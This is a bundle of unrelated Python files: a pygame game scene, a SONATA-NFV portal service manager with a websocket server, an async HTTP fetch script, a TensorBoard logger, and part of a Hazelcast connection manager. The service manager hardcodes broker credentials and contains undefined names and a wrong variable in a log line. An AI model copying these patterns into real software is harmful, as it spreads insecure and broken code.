self.explosion_sprite_size,
self.explosion_speed)
self.is_explosion_started = False
self.settings = Settings()
self.font = pygame.font.SysFont("Monospace", 40, bold=False, italic=False)
self.calculate_tile_size()
self.make_threads()
def make_threads(self):
"""
Start threads to change game state
:return: None
"""
threading.Thread(target=self.update_track).start()
threading.Thread(target=self.update_move).start()
if self.settings['music']:
self.main_theme_music.play()
def update_track(self):
"""
Updating track for next game state
:return: None
"""
while not self.is_end():
if not self.obstacle.wait:
self.obstacle.attach()
self.obstacle.wait = OBSTACLE_WAIT_FOR_NEXT if not self.obstacle.wait else self.obstacle.wait - 1
if self.player.is_dead:
ScoreScene.save(self.player.score)
self.is_explosion_started = True
self.player.detach()
self.explosion.start()
if self.settings['music']:
self.explosion_sound.play()
break
self.player.detach()
self.track.move()
self.player.attach()
self.player.score += 1
if self.player.score % (SPEED_INCREASE_SCORE * self.track.level) == 0:
self.track.speed += 1
if self.player.score % (LEVEL_INCREASE_SCORE * self.track.level) == 0:
self.track.level += 1
self.player.lives_count = int(self.player.lives_count * PLAYER_LIVES_INCREASE)
self.track.speed = self.track.level
track_sleep_time = TRACK_MOVE_SLEEP_TIME / self.track.get_speed()
time.sleep(track_sleep_time)
def update_move(self):
"""
Update player move, handles player position on track
:return: None
"""
while not self.is_end():
if self.player.is_dead:
break
self.player.move()
time.sleep(PLAYER_MOVE_SLEEP_TIME)
def _event(self, event):
"""
Make event handle
:param event: any occurred event
:return: None
"""
for e in event.get():
if e.type == pygame.KEYDOWN:
if e.key == pygame.K_p:
self.set_next_scene("pause")
self.the_end()
elif e.key == pygame.K_ESCAPE:
ScoreScene.save(self.player.score)
self.set_next_scene("menu")
self.the_end()
elif e.key == pygame.K_LEFT:
self.player.direction = "left"
self.player.move()
elif e.key == pygame.K_RIGHT:
self.player.direction = "right"
self.player.move()
elif e.key == pygame.K_UP:
self.track.speed += 1
elif e.key == pygame.K_DOWN:
self.track.speed -= 1
elif e.type == pygame.KEYUP:
self.player.direction = None
def _update(self, dt):
"""
Update scene by time
:param dt: time interval pass from previous call
:return: None
"""
if self.is_explosion_started:
self.explosion.update(dt)
if not self.explosion.is_start() and self.player.is_dead:
self.set_next_scene("game_over")
self.the_end()
def _draw(self, dt):
"""
Redraw game by current status
:param dt: time interval pass from previous call
:return: None
"""
self.display.fill(BACKGROUND_COLOR)
self.draw_field()
self.draw_score()
if self.explosion.is_start():
player_center = [x - int(self.explosion_sprite_size / 2) for x in self.player.get_center(self.tile_size)]
self.display.blit(self.explosion.sprite, player_center, self.explosion.get_coords())
def the_end(self):
self.main_theme_music.stop()
super().the_end()
def calculate_tile_size(self):
field_width = self.width / 2
field_height = self.height
tile_height = field_height / self.track.tiles_y
tile_width = field_width / self.track.tiles_x
self.tile_size = int(tile_width if tile_height > tile_width else tile_height)
self.scaled_tile = pygame.transform.scale(self.tileset, (self.tile_size * TILES_COUNT, self.tile_size))
def draw_field(self):
margin = 1
for x in range(self.track.tiles_x):
for y in range(self.track.tiles_y):
# Draw tile in (x,y)
# get rect() area; select tile from tileset
destination = Rect(x * self.tile_size, y * self.tile_size, self.tile_size, self.tile_size)
src = Rect(self.track.tiles[x][y] * self.tile_size, 0, self.tile_size - margin, self.tile_size - margin)
self.display.blit(self.scaled_tile, destination, src)
def draw_score(self):
x = self.width / 2 + self.tile_size
y = self.tile_size
self.display.blit(self.font.render("Счёт: " + str(self.player.score), True, (0, 0, 0)), (x, y))
self.display.blit(self.font.render("Скорость: " + str(self.track.speed), True, (0, 0, 0)), (x, y*2))
self.display.blit(self.font.render("Жизней: " + str(self.player.lives_count), True, (0, 0, 0)), (x, y*3))
self.display.blit(self.font.render("Уровень: " + str(self.track.level), True, (0, 0, 0)), (x, y*4))
|
portal_configure.py
|
"""
Copyright (c) 2015 SONATA-NFV
ALL RIGHTS RESERVED.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Neither the name of the SONATA-NFV [, ANY ADDITIONAL AFFILIATION]
nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written
permission.
This work has been performed in the framework of the SONATA project,
funded by the European Commission under Grant number 671517 through
the Horizon 2020 and 5G-PPP programmes. The authors would like to
acknowledge the contributions of their colleagues of the SONATA
partner consortium (www.sonata-nfv.eu).
"""
import logging
import yaml
from sonsmbase.smbase import sonSMbase
import websocket
import _thread
import time
import sys
import pika
from threading import Thread
from websocket_server import WebsocketServer
from json import loads, dumps
logging.basicConfig(level=logging.INFO)
LOG = logging.getLogger("ssm-portal-configure-1")
LOG.setLevel(logging.DEBUG)
logging.getLogger("son-mano-base:messaging").setLevel(logging.INFO)
class Server:
# Called for every client connecting (after handshake)
def new_client(self, client, server):
logging.warning("*********************"+"New client connected and was given id"+ str(client['id']))
# Called for every client disconnecting
def client_left(self, client, server):
logging.warning("*********************"+"Client("+str(client['id'])+") disconnected")
# Called when a client sends a message
def message_received(self, client, server, message):
if len(message) > 200:
message = message[:200]+'..'
logging.warning("*********************"+"Client("+str(client['id'])+") said:"+message)
# Format message
messageDict = loads(message)
actionName = messageDict['name']
def amqp_send():
#self.manoconn.publish(topic='specific.manager.registry.ssm.status', message=yaml.dump(
# {'name':self.specific_manager_id,'status': 'UP and Running'}))
# Subscribe to the topic that the SLM will be sending on
#topic = 'generic.ssm.' + str(self.sfuuid)
#self.manoconn.subscribe(self.received_request, topic)
credentials = pika.PlainCredentials('wolke', 'wolke')
connection = pika.BlockingConnection(pika.ConnectionParameters(credentials=credentials,host='10.10.243.101'))
channel = connection.channel()
channel.queue_declare(queue='hello')
channel.basic_publish(exchange='',
routing_key='hello',
body='Hello World!')
logging.warning(" [x] Sent 'Hello World!'")
connection.close()
#TODO relay request on queue and wait for response
def sendMessage():
logging.warning("*********************"+"Sending Message")
amqp_send()
logging.warning("*********************"+"Sending Message")
amqp_send()
toSend = None
if actionName == "fsm start":
fsmName = messageDict['Data']['name']
fsmID = messageDict['Data']['id']
toSend = {"name": actionName, "Data": {
"name": fsmName,
"id": fsmID,
"state": "started"
}
}
if actionName == "fsm stop":
fsmName = messageDict['Data']['name']
fsmID = messageDict['Data']['id']
toSend = {"name": actionName, "Data": {
"name": fsmName,
"id": fsmID,
"state": "stopped"
}
}
if actionName == "basic start":
logging.warning("*********************"+actionName)
toSend = {
"name": "basic start",
"data":
[
{"name": "Firewall", "id": "1", "state": "started"},
{"name": "VPN", "id": "2", "state": "started"}
],
}
if actionName == "basic stop":
logging.warning("*********************"+actionName)
toSend = {
"name": "basic stop",
"data":
[
{"name": "Firewall", "id": "1", "state": "stopped"},
{"name": "VPN", "id": "2", "state": "stopped"}
],
}
if actionName == "anon start":
logging.warning("*********************"+actionName)
toSend = {
"name": "anon start",
"data":
[
{"name": "Firewall", "id": "1", "state": "started"},
{"name": "VPN", "id": "2", "state": "started"},
{"name": "TOR", "id": "3", "state": "started"},
#{"name": "HTTP Proxy", "id": "4", "state": "started"},
{"name": "IDS", "id": "5", "state": "started"}
],
}
if actionName == "anon stop":
logging.warning("*********************"+actionName)
toSend = {
"name": "anon stop",
"data":
[
{"name": "Firewall", "id": "1", "state": "stopped"},
{"name": "VPN", "id": "2", "state": "stopped"},
{"name": "TOR", "id": "3", "state": "stopped"},
#{"name": "HTTP Proxy", "id": "4", "state": "stopped"},
{"name": "IDS", "id": "5", "state": "stopped"}
],
}
try:
toSendJson = dumps(toSend)
logging.warning("*********************"+toSendJson)
server.send_message(client, toSendJson)
except Exception as e:
logging.warning("*********************"+str(e))
sendMessage()
def listenToFSMRequests(self):
#logging.warning("*********************","Listening to Requests...!")
logging.warning("*********************Listening to Requests...!")
port=9191
host="0.0.0.0"
#host="selfservice-ssm"
server = WebsocketServer(port, host=host)
server.set_fn_new_client(self.new_client)
server.set_fn_client_left(self.client_left)
server.set_fn_message_received(self.message_received)
server.run_forever()
class Portal_Configure(sonSMbase):
def __init__(self):
"""
:param specific_manager_type: specifies the type of specific manager that could be either fsm or ssm.
:param service_name: the name of the service that this specific manager belongs to.
:param function_name: the name of the function that this specific manager belongs to, will be null in SSM case
:param specific_manager_name: the actual name of specific manager (e.g., scaling, placement)
:param id_number: the specific manager id number which is used to distinguish between multiple SSM/FSM
that are created for the same objective (e.g., scaling with algorithm 1 and 2)
:param version: version
:param description: description
"""
self.specific_manager_type = 'ssm'
self.service_name = 'psa'
self.specific_manager_name = 'portal-configure'
self.id_number = '1'
self.version = 'v0.1'
self.counter = 0
self.nsd = None
self.vnfs = None
self.description = "An empty SSM"
super(self.__class__, self).__init__(specific_manager_type= self.specific_manager_type,
service_name= self.service_name,
specific_manager_name = self.specific_manager_name,
id_number = self.id_number,
version = self.version,
description = self.description)
self.setup_portal_conn()
self.run()
def on_registration_ok(self):
LOG.info("Received registration ok event.")
self.manoconn.publish(topic='specific.manager.registry.ssm.status', message=yaml.dump(
{'name':self.specific_manager_id,'status': 'UP and Running'}))
# Subscribe to the topic that the SLM will be sending on
topic = 'generic.ssm.' + str(self.sfuuid)
self.manoconn.subscribe(self.received_request, topic)
# Does this go here?
def configure_event(self, content):
"""
This method handles a configure event.
"""
LOG.info("Performing life cycle configure event")
LOG.info("content: " + str(content.keys()))
# TODO: Add the configure logic. The content is a dictionary that
# contains the required data
nsr = content['nsr']
vnfrs = content['vnfrs']
for vnfr in vnfrs:
if (vnfr['virtual_deployment_units'][0]['vm_image']) == 'http://files.sonata-nfv.eu/son-psa-pilot/vpn-vnf/sonata-vpn.qcow2':
vpn_ip = vnfr['virtual_deployment_units'][0]['vnfc_instance'] [0]['connection_points'][0]['interface']['address']
LOG.info("vVPN's management IP retrieved: "+vpn_ip)
if (vnfr['virtual_deployment_units'][0]['vm_image']) == 'http://files.sonata-nfv.eu/son-psa-pilot/tor-vnf/sonata-tor.qcow2':
tor_ip = vnfr['virtual_deployment_units'][0]['vnfc_instance'] [0]['connection_points'][0]['interface']['address']
LOG.info("vTOR's management IP retrieved: "+tor_ip)
# instead of sonata-prx, image might be u16squid-micro-x86-64-v04.qcow2
if (vnfr['virtual_deployment_units'][0]['vm_image']) == 'http://files.sonata-nfv.eu/son-psa-pilot/prx-vnf/sonata-prx.qcow2':
prx_ip = vnfr['virtual_deployment_units'][0]['vnfc_instance'] [0]['connection_points'][0]['interface']['address']
LOG.info("vProxy's management IP retrieved: "+prx_ip)
if (vnfr['virtual_deployment_units'][0]['vm_image']) == 'http://files.sonata-nfv.eu/son-psa-pilot/pfSense-vnf/pfsense-vnf.qcow2':
fw_ip = vnfr['virtual_deployment_units'][0]['vnfc_instance'] [0]['connection_points'][0]['interface']['address']
LOG.info("vFW's management IP retrieved: "+prx_ip)
# try:
iprev = reverse(vpn_ip)
LOG.info("Got the reverse IP to be turned to integer: "+iprev)
ipInt = int(netaddr.IPAddress(iprev))
LOG.info("Got the Integer from the IP: "+str(ipInt))
def setup_portal_conn(self):
"""
Setup the connection with the portal.
"""
# TODO: setup the connection with the portal
pass
def run(self):
"""
Start waiting for messages from portal.
"""
self.get_from_portal()
def get_from_portal(self):
"""
This method handles data coming from portal to SSM.
"""
# TODO: screen for messages
content = {}
# Start SSM process
self.on_input_from_portal(content)
def push_to_portal(self, content):
"""
This method handles data going from the SSM to the portal.
"""
# TODO: inform portal when changes to psa configuration occured.
pass
def on_input_from_portal(self, content):
"""
This method is called when the SSM receives a request from the portal.
"""
# TODO: create request for SLM based on content from portal
nsd = {}
vnfds = [{}, {}, {}]
request = {}
request['shedule'] = ["vnf_chain", "inform_ssm"]
request['payload'] = {'nsd': nsd, 'vnfds': vnfds}
# Make request to SLM
topic = 'generic.ssm.' + str(self.sfuuid)
self.manoconn.call_async(self.slm_response,
topic,
yaml.dump(request))
def slm_response(self, ch, method, prop, payload):
"""
This method handles the response from the SLM on the request to change
the chaining of the psa service.
"""
content = yaml.load(payload)
# TODO: Interact with the portal
data = {}
self.push_to_portal(data)
def main():
Portal_Configure()
server = Server()
Thread(target = server.listenToFSMRequests()).start()
if __name__ == '__main__':
main()
|
async_1.py
|
import webbrowser
import socket
import asyncio
import threading
url = "https://libgen.is/"
async def fetch(i):
#sock = socket.socket()
r, w = await asyncio.open_connection(
'libgen.is', 80)
request = 'GET {} HTTP/1.0\r\nHost: libgen.is\r\n\r\n'.format(url)
w.write(request.encode())
await w.drain()
response = b''
print('start-', i)
chunk = await r.read(4096)
while chunk:
response += chunk
chunk = await r.read(4096)
print('recieved-', i)
def start_browser():
import time
s = time.perf_counter()
threads = []
for x in range(10):
obj = threading.Thread(target=fetch, args=(x,))
threads.append(obj)
for a in threads:
a.start()
for b in threads:
b.join()
elapsed = time.perf_counter() - s
print(f"{__file__} executed in {elapsed:0.2f} seconds.")
#start_browser()
async def main():
await asyncio.gather(fetch(0),fetch(1),fetch(2),fetch(3),fetch(4),fetch(5), fetch(6), fetch(7), fetch(8), fetch(9))
if __name__ == "__main__":
import time
s = time.perf_counter()
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
asyncio.run(main())
elapsed = time.perf_counter() - s
print(f"{__file__} executed in {elapsed:0.2f} seconds.")
|
model_logging.py
|
import numpy as np
import scipy.misc
import threading
try:
from StringIO import StringIO # Python 2.7
except ImportError:
from io import BytesIO # Python 3.x
class Logger:
def __init__(self,
log_interval=50,
validation_interval=200,
generate_interval=500,
trainer=None,
generate_function=None):
self.trainer = trainer
self.log_interval = log_interval
self.validation_interval = validation_interval
self.generate_interval = generate_interval
self.accumulated_loss = 0
self.generate_function = generate_function
if self.generate_function is not None:
self.generate_thread = threading.Thread(target=self.generate_function)
self.generate_function.daemon = True
def log(self, current_step, current_loss):
self.accumulated_loss += current_loss
if current_step % self.log_interval == 0:
self.log_loss(current_step)
self.accumulated_loss = 0
if current_step % self.validation_interval == 0:
self.validate(current_step)
if current_step % self.generate_interval == 0:
self.generate(current_step)
def log_loss(self, current_step):
avg_loss = self.accumulated_loss / self.log_interval
print("loss at step " + str(current_step) + ": " + str(avg_loss))
def validate(self, current_step):
avg_loss, avg_accuracy = self.trainer.validate()
print("validation loss: " + str(avg_loss))
print("validation accuracy: " + str(avg_accuracy * 100) + "%")
def generate(self, current_step):
if self.generate_function is None:
return
if self.generate_thread.is_alive():
print("Last generate is still running, skipping this one")
else:
self.generate_thread = threading.Thread(target=self.generate_function,
args=[current_step])
self.generate_thread.daemon = True
self.generate_thread.start()
# Code referenced from https://gist.github.com/gyglim/1f8dfb1b5c82627ae3efcfbbadb9f514
class TensorboardLogger(Logger):
def __init__(self,
log_interval=50,
validation_interval=200,
generate_interval=500,
trainer=None,
generate_function=None,
log_dir='logs'):
import tensorflow as tf
super().__init__(log_interval, validation_interval, generate_interval, trainer, generate_function)
self.writer = tf.summary.FileWriter(log_dir)
def log_loss(self, current_step):
# loss
avg_loss = self.accumulated_loss / self.log_interval
self.scalar_summary('loss', avg_loss, current_step)
# parameter histograms
for tag, value, in self.trainer.model.named_parameters():
tag = tag.replace('.', '/')
self.histo_summary(tag, value.data.cpu().numpy(), current_step)
if value.grad is not None:
self.histo_summary(tag + '/grad', value.grad.data.cpu().numpy(), current_step)
def validate(self, current_step):
avg_loss, avg_accuracy = self.trainer.validate()
self.scalar_summary('validation loss', avg_loss, current_step)
self.scalar_summary('validation accuracy', avg_accuracy, current_step)
def log_audio(self, step):
samples = self.generate_function()
tf_samples = tf.convert_to_tensor(samples)
self.audio_summary('audio sample', tf_samples, step, sr=16000)
def scalar_summary(self, tag, value, step):
"""Log a scalar variable."""
summary = tf.Summary(value=[tf.Summary.Value(tag=tag, simple_value=value)])
self.writer.add_summary(summary, step)
def image_summary(self, tag, images, step):
"""Log a list of images."""
img_summaries = []
for i, img in enumerate(images):
# Write the image to a string
try:
s = StringIO()
except:
s = BytesIO()
scipy.misc.toimage(img).save(s, format="png")
# Create an Image object
img_sum = tf.Summary.Image(encoded_image_string=s.getvalue(),
height=img.shape[0],
width=img.shape[1])
# Create a Summary value
img_summaries.append(tf.Summary.Value(tag='%s/%d' % (tag, i), image=img_sum))
# Create and write Summary
summary = tf.Summary(value=img_summaries)
self.writer.add_summary(summary, step)
def audio_summary(self, tag, sample, step, sr=16000):
with tf.Session() as sess:
audio_summary = tf.summary.audio(tag, sample, sample_rate=sr, max_outputs=4)
summary = sess.run(audio_summary)
self.writer.add_summary(summary, step)
self.writer.flush()
def histo_summary(self, tag, values, step, bins=200):
"""Log a histogram of the tensor of values."""
# Create a histogram using numpy
counts, bin_edges = np.histogram(values, bins=bins)
# Fill the fields of the histogram proto
hist = tf.HistogramProto()
hist.min = float(np.min(values))
hist.max = float(np.max(values))
hist.num = int(np.prod(values.shape))
hist.sum = float(np.sum(values))
hist.sum_squares = float(np.sum(values ** 2))
# Drop the start of the first bin
bin_edges = bin_edges[1:]
# Add bin edges and counts
for edge in bin_edges:
hist.bucket_limit.append(edge)
for c in counts:
hist.bucket.append(c)
# Create and write Summary
summary = tf.Summary(value=[tf.Summary.Value(tag=tag, histo=hist)])
self.writer.add_summary(summary, step)
self.writer.flush()
def tensor_summary(self, tag, tensor, step):
tf_tensor = tf.Variable(tensor).to_proto()
summary = tf.Summary(value=[tf.Summary.Value(tag=tag, tensor=tf_tensor)])
#summary = tf.summary.tensor_summary(name=tag, tensor=tensor)
self.writer.add_summary(summary, step)
|
connection.py
|
import io
import logging
import random
import struct
import sys
import threading
import time
import uuid
from collections import OrderedDict
from hazelcast import six, __version__
from hazelcast.config import ReconnectMode
from hazelcast.core import AddressHelper, CLIENT_TYPE, SERIALIZATION_VERSION
from hazelcast.errors import (
AuthenticationError,
TargetDisconnectedError,
HazelcastClientNotActiveError,
InvalidConfigurationError,
ClientNotAllowedInClusterError,
IllegalStateError,
ClientOfflineError,
)
from hazelcast.future import ImmediateFuture, ImmediateExceptionFuture
from hazelcast.invocation import Invocation
from hazelcast.lifecycle import LifecycleState
from hazelcast.protocol.client_message import (
SIZE_OF_FRAME_LENGTH_AND_FLAGS,
Frame,
InboundMessage,
ClientMessageBuilder,
)
from hazelcast.protocol.codec import client_authentication_codec, client_ping_codec
from hazelcast.util import AtomicInteger, calculate_version, UNKNOWN_VERSION
_logger = logging.getLogger(__name__)
class _WaitStrategy(object):
def __init__(self, initial_backoff, max_backoff, multiplier, cluster_connect_timeout, jitter):
self._initial_backoff = initial_backoff
self._max_backoff = max_backoff
self._multiplier = multiplier
self._cluster_connect_timeout = cluster_connect_timeout
self._jitter = jitter
self._attempt = None
self._cluster_connect_attempt_begin = None
self._current_backoff = None
def reset(self):
self._attempt = 0
self._cluster_connect_attempt_begin = time.time()
self._current_backoff = min(self._max_backoff, self._initial_backoff)
def sleep(self):
self._attempt += 1
time_passed = time.time() - self._cluster_connect_attempt_begin
if time_passed > self._cluster_connect_timeout:
_logger.warning(
"Unable to get live cluster connection, cluster connect timeout (%ds) is reached. "
"Attempt %d.",
self._cluster_connect_timeout,
self._attempt,
)
return False
# random between (-jitter * current_backoff, jitter * current_backoff)
sleep_time = self._current_backoff + self._current_backoff * self._jitter * (
2 * random.random() - 1
)
sleep_time = min(sleep_time, self._cluster_connect_timeout - time_passed)
_logger.warning(
"Unable to get live cluster connection, retry in %.2fs, attempt: %d, "
"cluster connect timeout: %ds, max backoff: %ds",
sleep_time,
self._attempt,
self._cluster_connect_timeout,
self._max_backoff,
)
time.sleep(sleep_time)
self._current_backoff = min(self._current_backoff * self._multiplier, self._max_backoff)
return True
class _AuthenticationStatus(object):
AUTHENTICATED = 0
CREDENTIALS_FAILED = 1
SERIALIZATION_VERSION_MISMATCH = 2
NOT_ALLOWED_IN_CLUSTER = 3
class ConnectionManager(object):
"""ConnectionManager is responsible for managing ``Connection`` objects."""
def __init__(
self,
client,
config,
reactor,
address_provider,
lifecycle_service,
partition_service,
cluster_service,
invocation_service,
near_cache_manager,
):
self.live = False
self.active_connections = {} # uuid to connection, must be modified under the _lock
self.client_uuid = uuid.uuid4()
self._client = client
self._config = config
self._reactor = reactor
self._address_provider = address_provider
self._lifecycle_service = lifecycle_service
self._partition_service = partition_service
self._cluster_service = cluster_service
self._invocation_service = invocation_service
self._near_cache_manager = near_cache_manager
self._smart_routing_enabled = config.smart_routing
self._wait_strategy = self._init_wait_strategy(config)
self._reconnect_mode = config.reconnect_mode
self._heartbeat_manager = _HeartbeatManager(
self, self._client, config, reactor, invocation_service
)
self._connection_listeners = []
self._connect_all_members_timer = None
self._async_start = config.async_start
self._connect_to_cluster_thread_running = False
self._pending_connections = {} # must be modified under the _lock
self._addresses_to_connections = {} # must be modified under the _lock
self._shuffle_member_list = config.shuffle_member_list
self._lock = threading.RLock()
self._connection_id_generator = AtomicInteger()
self._labels = frozenset(config.labels)
self._cluster_id = None
self._load_balancer = None
def add_listener(self, on_connection_opened=None, on_connection_closed=None):
"""Registers a ConnectionListener.
If the same listener is registered multiple times, it will be notified multiple times.
Args:
on_connection_opened (function): Function to be called when a connection is opened. (Default value = None)
on_connection_closed (function): Function to be called when a connection is removed. (Default value = None)
"""
self._connection_listeners.append((on_connection_opened, on_connection_closed))
def get_connection(self, member_uuid):
return self.active_connections.get(member_uuid, None)
def get_connection_from_address(self, address):
return self._addresses_to_connections.get(address, None)
def get_random_connection(self):
if self._smart_routing_enabled:
member = self._load_balancer.next()
if member:
connection = self.get_connection(member.uuid)
if connection:
return connection
# We should not get to this point under normal circumstances.
# Therefore, copying the list should be OK.
for connection in list(six.itervalues(self.active_connections)):
return connection
return None
def start(self, load_balancer):
if self.live:
return
self.live = True
self._load_balancer = load_balancer
self._heartbeat_manager.start()
self._connect_to_cluster()
if self._smart_routing_enabled:
self._start_connect_all_members_timer()
def shutdown(self):
if not self.live:
return
self.live = False
if self._connect_all_members_timer:
self._connect_all_members_timer.cancel()
self._heartbeat_manager.shutdown()
with self._lock:
for connection_future in six.itervalues(self._pending_connections):
connection_future.set_exception(
HazelcastClientNotActiveError("Hazelcast client is shutting down")
)
# Need to create copy of connection values to avoid modification errors on runtime
for connection in list(six.itervalues(self.active_connections)):
connection.close("Hazelcast client is shutting down", None)
self.active_connections.clear()
self._addresses_to_connections.clear()
self._pending_connections.clear()
del self._connection_listeners[:]
def connect_to_all_cluster_members(self):
if not self._smart_routing_enabled:
return
for member in self._cluster_service.get_members():
try:
self._get_or_connect(member.address).result()
except:
pass
def on_connection_close(self, closed_connection, cause):
connected_address = closed_connection.connected_address
remote_uuid = closed_connection.remote_uuid
remote_address = closed_connection.remote_address
if not connected_address:
_logger.debug(
"Destroying %s, but it has no remote address, hence nothing is "
"removed from the connection dictionary",
closed_connection,
)
with self._lock:
pending = self._pending_connections.pop(connected_address, None)
connection = self.active_connections.pop(remote_uuid, None)
self._addresses_to_connections.pop(remote_address, None)
if pending:
pending.set_exception(cause)
if connection:
_logger.info(
"Removed connection to %s:%s, connection: %s",
connected_address,
remote_uuid,
connection,
)
if not self.active_connections:
self._lifecycle_service.fire_lifecycle_event(LifecycleState.DISCONNECTED)
self._trigger_cluster_reconnection()
if connection:
for _, on_connection_closed in self._connection_listeners:
if on_connection_closed:
try:
on_connection_closed(connection, cause)
except:
_logger.exception("Exception in connection listener")
else:
if remote_uuid:
_logger.debug(
"Destroying %s, but there is no mapping for %s in the connection dictionary",
closed_connection,
remote_uuid,
)
def check_invocation_allowed(self):
if self.active_connections:
return
if self._async_start or self._reconnect_mode == ReconnectMode.ASYNC:
raise ClientOfflineError()
else:
raise IOError("No connection found to cluster")
def _trigger_cluster_reconnection(self):
if self._reconnect_mode == ReconnectMode.OFF:
_logger.info("Reconnect mode is OFF. Shutting down the client")
self._shutdown_client()
return
if self._lifecycle_service.running:
self._start_connect_to_cluster_thread()
def _init_wait_strategy(self, config):
cluster_connect_timeout = config.cluster_connect_timeout
if cluster_connect_timeout == -1:
# If the no timeout is specified by the
# user, or set to -1 explicitly, set
# the timeout to infinite.
cluster_connect_timeout = sys.maxsize
return _WaitStrategy(
config.retry_initial_backoff,
config.retry_max_backoff,
config.retry_multiplier,
cluster_connect_timeout,
config.retry_jitter,
)
def _start_connect_all_members_timer(self):
connecting_addresses = set()
def run():
if not self._lifecycle_service.running:
return
for member in self._cluster_service.get_members():
address = member.address
if (
not self.get_connection_from_address(address)
and address not in connecting_addresses
):
connecting_addresses.add(address)
if not self._lifecycle_service.running:
break
if not self.get_connection(member.uuid):
# Bind the address to the value
# in this loop iteration
def cb(_, address=address):
connecting_addresses.discard(address)
self._get_or_connect(address).add_done_callback(cb)
self._connect_all_members_timer = self._reactor.add_timer(1, run)
self._connect_all_members_timer = self._reactor.add_timer(1, run)
def _connect_to_cluster(self):
if self._async_start:
self._start_connect_to_cluster_thread()
else:
self._sync_connect_to_cluster()
def _start_connect_to_cluster_thread(self):
with self._lock:
if self._connect_to_cluster_thread_running:
return
self._connect_to_cluster_thread_running = True
def run():
try:
while True:
self._sync_connect_to_cluster()
with self._lock:
if self.active_connections:
self._connect_to_cluster_thread_running = False
return
except:
_logger.exception("Could not connect to any cluster, shutting down the client")
self._shutdown_client()
t = threading.Thread(target=run, name="hazelcast_async_connection")
t.daemon = True
t.start()
def _shutdown_client(self):
try:
self._client.shutdown()
except:
_logger.exception("Exception during client shutdown")
def _sync_connect_to_cluster(self):
tried_addresses = set()
self._wait_strategy.reset()
try:
while True:
for address in self._get_possible_addresses():
self._check_client_active()
tried_addresses.add(address)
connection = self._connect(address)
if connection:
return
# If the address providers load no addresses (which seems to be possible),
# then the above loop is not entered and the lifecycle check is missing,
# hence we need to repeat the same check at this point.
self._check_client_active()
if not self._wait_strategy.sleep():
break
except (ClientNotAllowedInClusterError, InvalidConfigurationError):
cluster_name = self._config.cluster_name
_logger.exception("Stopped trying on cluster %s", cluster_name)
cluster_name = self._config.cluster_name
_logger.info(
"Unable to connect to any address from the cluster with name: %s. "
"The following addresses were tried: %s",
cluster_name,
tried_addresses,
)
if self._lifecycle_service.running:
msg = "Unable to connect to any cluster"
else:
msg = "Client is being shutdown"
raise IllegalStateError(msg)
def _connect(self, address):
_logger.info("Trying to connect to %s", address)
try:
return self._get_or_connect(address).result()
except (ClientNotAllowedInClusterError, InvalidConfigurationError) as e:
_logger.warning("Error during initial connection to %s: %s", address, e)
raise e
except Exception as e:
_logger.warning("Error during initial connection to %s: %s", address, e)
return None
def _get_or_connect(self, address):
connection = self.get_connection_from_address(address)
if connection:
return ImmediateFuture(connection)
with self._lock:
connection = self.get_connection_from_address(address)
if connection:
return ImmediateFuture(connection)
else:
pending = self._pending_connections.get(address, None)
if pending:
return pending
else:
try:
translated = self._address_provider.translate(address)
if not translated:
error = ValueError(
"Address translator could not translate address %s" % address
)
return ImmediateExceptionFuture(error)
factory = self._reactor.connection_factory
connection = factory(
self,
self._connection_id_generator.get_and_increment(),
translated,
self._config,
self._invocation_service.handle_client_message,
)
except IOError:
error = sys.exc_info()
return ImmediateExceptionFuture(error[1], error[2])
future = self._authenticate(connection).continue_with(
self._on_auth, connection, address
)
self._pending_connections[address] = future
return future
def _authenticate(self, connection):
client = self._client
cluster_name = self._config.cluster_name
client_name = client.name
request = client_authentication_codec.encode_request(
cluster_name,
None,
None,
self.client_uuid,
CLIENT_TYPE,
SERIALIZATION_VERSION,
__version__,
client_name,
self._labels,
)
invocation = Invocation(
request, connection=connection, urgent=True, response_handler=lambda m: m
)
self._invocation_service.invoke(invocation)
return invocation.future
def _on_auth(self, response, connection, address):
if response.is_success():
response = client_authentication_codec.decode_response(response.result())
status = response["status"]
if status == _AuthenticationStatus.AUTHENTICATED:
return self._handle_successful_auth(response, connection, address)
if status == _AuthenticationStatus.CREDENTIALS_FAILED:
err = AuthenticationError(
"Authentication failed. The configured cluster name on "
"the client does not match the one configured in the cluster."
)
elif status == _AuthenticationStatus.NOT_ALLOWED_IN_CLUSTER:
err = ClientNotAllowedInClusterError("Client is not allowed in the cluster")
elif status == _AuthenticationStatus.SERIALIZATION_VERSION_MISMATCH:
err = IllegalStateError("Server serialization version does not match to client")
else:
err = AuthenticationError(
"Authentication status code not supported. status: %s" % status
)
connection.close("Failed to authenticate connection", err)
raise err
else:
e = response.exception()
# This will set the exception for the pending connection future
connection.close("Failed to authenticate connection", e)
six.reraise(e.__class__, e, response.traceback())
def _handle_successful_auth(self, response, connection, address):
self._check_partition_count(response["partition_count"])
server_version_str = response["server_hazelcast_version"]
remote_address = response["address"]
remote_uuid = response["member_uuid"]
connection.remote_address = remote_address
connection.server_version = calculate_version(server_version_str)
connection.remote_uuid = remote_uuid
new_cluster_id = response["cluster_id"]
is_initial_connection = not self.active_connections
changed_cluster = (
is_initial_connection
and self._cluster_id is not None
and self._cluster_id != new_cluster_id
)
if changed_cluster:
_logger.warning(
"Switching from current cluster: %s to new cluster: %s",
self._cluster_id,
new_cluster_id,
)
self._on_cluster_restart()
with self._lock:
self.active_connections[remote_uuid] = connection
self._addresses_to_connections[remote_address] = connection
self._pending_connections.pop(address, None)
if is_initial_connection:
self._cluster_id = new_cluster_id
self._lifecycle_service.fire_lifecycle_event(LifecycleState.CONNECTED)
_logger.info(
"Authenticated with server %s:%s, server version: %s, local address: %s",
remote_address,
remote_uuid,
server_version_str,
connection.local_address,
)
for on_connection_opened, _ in self._connection_listeners:
if on_connection_opened:
try:
on_connection_opened(connection)
except:
_logger.exception("Exception in connection listener")
if not connection.live:
self.on_connection_close(connection, None)
return connection
def _on_cluster_restart(self):
self._near_cache_manager.clear_near_caches()
self._cluster_service.clear_member_list_version()
def _check_partition_count(self, partition_count):
if not self._partition_service.check_and_set_partition_count(partition_count):
raise ClientNotAllowedInClusterError(
